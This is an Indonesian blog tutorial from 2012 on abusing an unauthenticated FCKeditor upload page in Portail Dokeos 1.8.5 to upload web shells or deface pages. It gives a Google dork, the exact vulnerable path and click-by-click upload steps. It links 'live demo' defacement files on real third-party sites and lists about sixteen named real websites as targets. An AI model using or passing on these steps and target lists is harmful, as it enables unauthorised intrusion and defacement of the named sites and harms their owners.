Sabtu, 30 Juni 2012

"Portail Dokeos" File Upload vulnerability


Portail Dokeos adalah semacam FCK editor remote file upload di vulnerability ini hacker bisa mengupload shell ataupun halaman deface ,  teman-teman dapat mengupload dan melihat halaman deface atau file yang akan di upload pada website tanpa username dan password admin . Oke Langsung aja ke tutorialnya ..





Google Dork : 
"Portail Dokeos 1.8.5"


Exploit :
http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

Nah, Setelah Teman-Teman Menemukan Situs yang vulnerability dari om Google ,lakukanlah langkah-langkah berikut :
  •  pergi ke : http://taget teman/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  • Ganti ASP ke PHP kemudian > klik browse > kemudian pilih file yang ingin teman upload > kemudian klik upload. Teman-Teman Bisa mengupload File Yang Berkstensi : PHP,HTML,JPG, Dan TXT 
  • Untuk melihat Hasil File yang sudah di upload pergi ke : http://website/patch/main/upload/file sobat
Demo :
Live Demo : http://www.blowupwebshow.com/staff/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Hasil : http://www.blowupwebshow.com/staff/main/upload/r14nul.html

Live Demo : http://www.rottapro.net/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Hasil : http://www.rottapro.net/main/upload/r14nul.html

Live Demo : http://www.dokeos.nrc-gauthey.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html Hasil : http://www.dokeos.nrc-gauthey.fr/main/upload/r14nul.html
Situs Lain Yang Memiliki Vulnerability :

  • http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  • http://ns5.freeheberg.com/~dispensa/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  • http://www.dokeos.nrc-gauthey.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  • http://www.ladapt-hn.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  • http://my.eurasiam.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  • http://el.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  • http://www.formation.megalodon.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  • http://www.pharmconseil-elearning.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  • http://pro.accru.info/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  • http://www.formation-microkine.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  • http://foad.ina.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  • http://campus.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  • http://www.fpafoad22.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  • http://www.ecoleprimaireenligne.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  • http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  • http://www.elearning80.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html


Sekian Dulu ya, Kawan :D ( ma'af Tutorialnya Jelek ) , semoga bermanfaat :D

Tidak ada komentar:

Posting Komentar